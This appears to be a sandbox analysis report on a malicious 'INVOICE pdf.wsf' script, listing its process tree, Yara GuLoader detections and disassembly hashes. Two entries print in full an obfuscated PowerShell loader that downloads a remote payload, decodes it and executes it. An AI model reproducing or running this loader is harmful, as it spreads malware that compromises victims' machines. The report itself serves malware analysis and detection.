                                  Data Ascii: E5zMMI//03qYVxRcUuD7hiNu4/nNpRGJiGnKQY5xnb3jVRHVhWzZ/LnyWeYlhRBTgKtarLn4GwT/pZ9Z5cv1uYaeCYB7hpkRg9Pj94st6kNCHH/nN9ktdfB4d890TS90oPap1BlnF2uEfC35zcIkT59yd2oJ55vsoMTH6rVMFqLGQCiFxREthyxDfpx2UJYsv6iOogs3wcMApGSvPz2PprvkOpHkHamIfbN4FICxxTDlhzH+O+k


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INVOICE pdf.wsf"
                                  Imagebase:0x7ff7face0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping 127.0.0.1 -n 1
                                  Imagebase:0x7ff74f6d0000
                                  File size:22'528 bytes
                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\PING.EXE
                                  Wow64 process (32bit):false
                                  Commandline:ping %.%.%.%
                                  Imagebase:0x7ff74f6d0000
                                  File size:22'528 bytes
                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /c dir
                                  Imagebase:0x7ff7004c0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:18:15:53
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:18:15:54
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;"
                                  Imagebase:0x7ff788560000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:8
                                  Start time:18:15:54
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:9
                                  Start time:18:15:56
                                  Start date:19/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
                                  Imagebase:0x7ff7004c0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:18:16:05
                                  Start date:19/04/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Srbrns = 1;$Headling='Substrin';$Headling+='g';Function Fremtidsmuligheders($Elmiernflatable){$Uddannelsesafdelingerne=$Elmiernflatable.Length-$Srbrns;For($Elmier=5; $Elmier -lt $Uddannelsesafdelingerne; $Elmier+=(6)){$Undepreciative+=$Elmiernflatable.$Headling.Invoke($Elmier, $Srbrns);}$Undepreciative;}function Udslyngende($barm){& ($deforming) ($barm);}$Paviour=Fremtidsmuligheders ' ThemMBentjoTumulz couninonbilSo erl KonnaHelss/ Mus.5Maegl.Journ0Enlac Ci r(vesp,W MoriiPhthon AnoddKejs,oanal wDawttsEnkel EmascNSe,icT Reof Optim1Kanal0Nac o.Eviln0 Cohe;Biote restWAn,stiBagtandigam6 nse4Teleo;Exist Labox f,sk6 mas,4ukoll;Sinus Cinqur ,ntrvPtafi:Insta1H log2 Fals1 Dehu.D nsk0Photo)Konfo S,igmG KlbbeMiljicHjr,mkVievaomacro/.ring2 Rute0Tyngd1Iagtt0Twirl0Afste1Storm0Termo1Hors. SnrehFNucleiPopparYe,hoewifehfTaranoC.araxThy s/ar en1Abave2 orsi1Ikono.Dotti0Wordi ';$Presserendes=Fremtidsmuligheders ',pittUPrcissTimiaeCharmrSau.e- UtakAp ocrgItureealbifnCon,it avyt ';$Hustankes=Fremtidsmuligheders ' TephhRund tFootbtLim,sp Glyp:Respe/Regie/NegatoA.stir.ameliScurvgsammeiUngrinCheeraS,ruplFejlhcProlooDgnaanOsmogc riveFil,hpPe att Nyh,skonsoiT,iumnSuniocSmu t.Cerv.r nsinulo.us.CompucBacksoKogejmH.sge/ uswiaopsens .rked.ompltSpi e/ProjeKLevera DagsrSkraadCombiiImagon TritaBarsel SubgiForbitflocceFor.rtNeedee domiradver.OpsnupDebugfSkabeb saer ';$Agricolous=Fremtidsmuligheders '.onke>Sorts ';$deforming=Fremtidsmuligheders ',mpudiRevereGobsmxabbre ';$Befrogged = Fremtidsmuligheders 'Bas.geEtiolc PlanhParaloOlier flapp%Solsya.torip Catep D,owdSubc aBgerbtStrenaIng.n%Skiin\AsparBLikvieNebran Sta,zSengei AnthdTvangi.skarnT.lgaeSpids2Stro 3 econ3Ski d. GrosSCamoujC,terlProra Smok&Curta&Dipsa Afsjle Af uc ntomh kraoSalam Dephl$Frugt ';Udslyngende (Fremtidsmuligheders 'Panto$treergModiflCel,sokermab Kar a Bolil issa: kvalMFilmfa.niveu ilmer H,meeAric rAde onKodake Un,e= Folk(KraftcGilbemPerpedMadre lifto/ Mo ocPatho Kalkv$No,psBhappeeKanaefHalobr fnugoUnriggKlassgUn.areBygnid Fleu) Re i ');Udslyngende (Fremtidsmuligheders 'f.aar$ akshgEctoglRavinoOpr,jbangusaDe orlMaler:A mrkC.ltrahDrawaaDatelrM.rblmCo.che AarsuGrayfsNsk,beBeds rneighnNeuroe ApossIndda=U.kla$FredsHThumbuBombesPyromt P,rtaSprinnJounckBedeaeTilsysPalin.Dagmas.enoppHippalgr seiBefritJernb(Op,as$Sk,inACara.gDun erK,eolis ocucChiroo VililB.itooPi,peuOcells.ntar) Bu.c ');$Hustankes=$Charmeusernes[0];Udslyngende (Fremtidsmuligheders 'Scrof$UtopigNephrl Tan,oV.ndfb ,pomaBeakel.upli:TudbrR SelvoPyntetOverca NondtGuariiForsko Ann,n Da nsAll vp By nuBeatmmwholep B ggeZost,r.muldnDubioeContisLigul1Elect0Sto.e1 Jumi=Bar.kNBestoeSkinkw,aabe-Up.elOSkrmab Rij,j Intee PollcSpatut Cobw explaSPowdeyPres,sExcitt RosaeFo esmAllor.AfbinNScraneSpec.t Faun.AntipWKemikeBekl.bKyndeCem,lslMal xiMensteUndown S.rntM,tab ');Udslyngende (Fremtidsmuligheders ' asm$PeaseRCham oColoutDialeaViewitOverei UrtiolodgenAntiws.ongsp ,estu.ictymBordspSkatteVandcrM,stinLoga,ecab zs.play1Dicye0Straf1T,ely. SprtH.eisme Encya Defrd KnoceGelser DitesDrift[Lavri$ OptoP siphrRivineBjrg,sPreobs Poche BererUartie.nnovn Apatd For.eSkra sL.eng]Ambpi=Chron$TrailP GgehalufthvOv,rriJestsoStibbuG ovdrUnwor ');$Premanufacturer=Fremtidsmuligheders 'De ilR.iniaoBoycot S lea Anvet FodgiHenfroBrotanBankfsBrancpMetatuPseudmTa,kbpKryp,eSterrrselvbnDonkreRo,ies Rsen1Besk,0Rakke1 ocr .PolemDBethuoReinhw PassnSoutalByggeo He aaPe.tadTeknoF ,kspiToquel.pporeBelli( Sa.w$UdmaaHH.shiuUnde sPermutUds,uaHj mmnEgenkkM,gneeMisdasgenia,Sadel$De,enSBambieB virmDiveri.anglhoffraySce,ep.verdeAdan,rTropibsubjao Kal.lFiguriSubtrcDingeaOutd lopdra1scaph6,atac3Ageis),outh ';$Premanufacturer=$Maurerne[1]+$Premanufacturer;$Semihyperbolical163=$Maurerne[0];Udslyngende (Fremtidsmuligheders ' allo$BlesugfaitolMel.toBrandbduckwaOut ol Figu:Par pDSarcoe FyrfsSpredt M.lar ,ombu OksekBrobatr,ndviCyke.o In,enSe,ioeEnc mn ulle=H tel(An.sbTbr,dsehypobsDihy.tLep.d-R cklP Revia ChedtBor.bhMe,sl foref$ChadlSErythe Bnn.mpathwiTopbehOver,yFeltspHl,seeOutlerSvigtb D.feoPa.iflCointiCystoc roscaSul hlPerpl1Richl6 budg3Fe.ls)stabi ');while (!$Destruktionen) {Udslyngende (Fremtidsmuligheders 'Tuber$ShockgPalaelUsdelohomopbheadsasluiclProgr:VialfCStjfloPairid anhaaMlketmHyperi luttnDanefe,lhal=Bridg$ Blo,to,jekrAkselu T,reeL.ref ') ;Udslyngende $Premanufacturer;Udslyngende (Fremtidsmuligheders 'T.ngsS Nau t.isemaStudirDe,ontraits-BrnabSFissilVestueS,ppeefremsp Schl Vedhf4Finge ');Udslyngende (Fremtidsmuligheders 'Biern$ Av rgFo,fllS.lito.ejfnbTidlsaC,lyclLow.i:UlejlDCowineHe,ipsKenyatFricarUdstyuSelenkBen htFelloiVarieofragan InfieI adenEr at=F,tto(par,rTFunereSemansSpildt.nwhe- E.hePAn.elaB.ugetAtomkhAkros B.kss$ReaveSS perePyro mDevili parth outcyFordrpGlde,eEuplar DictbMullioScrawlSetaeiTipspcGaitaaSejrsl Bhoo1Larva6Udty 3K,rke)Un,ic ') ;Udslyngende (Fremtidsmuligheders 'Bibli$Mystig TroelOvermoContebPara,aKyllilKunst:Objeco,resuuTrkketUlcers NondcKorpuo arkalRyggedOprin=Kosme$Homilg magllKnalloM,ldvbTicklaDesinlBollo:Cen rD temam.ydrepprcednBla,ei.oodrnBnne gLensbeFor.rn,isti+Sn,se+ ,pil%unref$Cha nCFiskehOxidia oolorBorgmmGenereQuaveuGudr s Abone.phanrSortbnnonsaeP stdsSk.lp. ForlcCaccio.iorduskokrnReakttKauti ') ;$Hustankes=$Charmeusernes[$outscold];}Udslyngende (Fremtidsmuligheders ' Sne.$Tidssgpr,sslUprooo Warsb ChryaBenzil.reak:Sku dFPlantoTeo orKont.e ,lats Biedt Unturrundpi Tys,e Ei,esBrede Ar.e=Paleo LabiGLumskeXylottPrste- InkbCI.teropraxinDipletLe.ite olomnDefintS,vog Timin$EnsnaSSkovseafholmvrdifiCarabhSkramyDkninp SankeH.perrDuplibFirmiohusetlAfte,i Lenac HymnaReslal duca1Soci.6Pensi3 rick ');Udslyngende (Fremtidsmuligheders 'Omin.$Enkelg MaxilSvieroskru,b Unema SupelU ern:Bat.eSCoolheSlebenDelphiNonquoNormarO erssKigsst JenhiA armp.nirte DiscnUnde,d Mi.tiBl,dea.akobtDe.issF ber Neel= elat Vmmel[ PostSOveriyP stesCh yetOsteaeDenebm ufte.OverpCDomm,oStamhnVelsovRefereAl,alrArtsmt Kond]Hoven:Comme:RecycFTriolrNonscoTheramEska.Bsk tta H ggs It leIn.om6 Xan,4OpdyrSSoldatPleb.rChantiklebinBesvagFo th(Meane$ForlgFSlabboactivrEneceeFor,isAm.ritEgoisrJulefi SlideNglevsTr ma)Br.ge ');Udslyngende (Fremtidsmuligheders 'inds.$,angsgMammal Lix,oEffuvbRumbaaSammelHvo.m: ,dstZ GastaAvestnStaaltLursaeJazz wIndkao.ycopoPinkid,evis dipl =Detai Kron[OdontSStrany frousCynodt Po.lekosmomRatsb.Tang TM.coleFolloxBe.latVaads.GarreESteamn AfstcS.smaoHemisdBivari ,vernPosttgCivil]Semiv:Sulf,:KalkbA FadeSVe,liC Lse,I KollI ref. DdsdGA tioeOver,tPaadmSHyatttM.norrC arai For,nFordeg ooth( bind$ HandS dsmye Shadn UturiLore,oSa.emrAkku.sHundrtTige ipoulapinduke FalbnAfsted ,entiRockfaGtepatBadgesSkude)Diape ');Udslyngende (Fremtidsmuligheders ' Pati$DetaigLyspalKo.kuoBoernbDisruaHattelcassy:SlageG TataeSemislUniveaCholotSighli,ndhfn oseiSi,elzRinediEquicnMe.iagPreun1.yvaa9Apoac2Proce=Bedrv$En.uiZBlomsaBigonnAftagtU,threJaevnwEnarboDe,onoPresedBozin.Derrys Ugesu SidebFiskes R.dit Tegar FamiiTsurinTll.rg Albu(Korne2burea9Vascu5Hensi9Tyskl8 Frit6Vaade,Heyru3 Pudd0 re.r4Dakot2Gautp8Go,mo)In,ei ');Udslyngende $Gelatinizing192;"
                                  Imagebase:0x770000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.4098203498.0000000005EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.4120919409.0000000008AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.4121086885.0000000009D38000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:11
                                  Start time:18:16:06
                                  Start date:19/04/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Benzidine233.Sjl && echo $"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Executed Functions

                                    Function 00007FFD9B89B1A6 Relevance: .5, Instructions: 477COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4225696860.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6335b47d553b242bad27d5dde6464c88d3122aeda353fdaa942bd6ba990ff5eb
                                    • Instruction ID: 201f45c23db43497c01f15a336431ab92d3ae74db045c0e94e4bae387efa966f
                                    • Opcode Fuzzy Hash: 6335b47d553b242bad27d5dde6464c88d3122aeda353fdaa942bd6ba990ff5eb
                                    • Instruction Fuzzy Hash: A1F1A730A09A8E8FEFA8DF68C8557E93BD1FF58310F44426EE84DC7295DB3499458B81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B89BF52 Relevance: .5, Instructions: 463COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4225696860.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c25ebbcd69aa1a47644b4a637e481beccc22871a3872dd7a1a143c536b553896
                                    • Instruction ID: 52ac790791b5c1fd5775c2b258f46b1efddbb54e050260350c9484a44ac88777
                                    • Opcode Fuzzy Hash: c25ebbcd69aa1a47644b4a637e481beccc22871a3872dd7a1a143c536b553896
                                    • Instruction Fuzzy Hash: 0FE1C530A09A4E8FEFA8DF68C8557E97BD1FF58310F04426EE84DC7295DE35A9418B81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B964169 Relevance: .5, Instructions: 495COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4227052908.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b19027e0e74847038df40d7c49ccb167e5c20c12eba08a166e23f948c15d7e9
                                    • Instruction ID: 0d85fc6495e7f2702c2c7eab61d588a970cc5357bd50374571cb414e29027196
                                    • Opcode Fuzzy Hash: 9b19027e0e74847038df40d7c49ccb167e5c20c12eba08a166e23f948c15d7e9
                                    • Instruction Fuzzy Hash: 4CE13932B1EA8E9FE7A5DBA848757B47BD1EF55310B1901BED05DC72E3DA18A8018341
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B96534D Relevance: .4, Instructions: 374COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4227052908.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d585f6b507fc6048f5440ee45e9cacf51a8cc3e7144133399a037b64000642f8
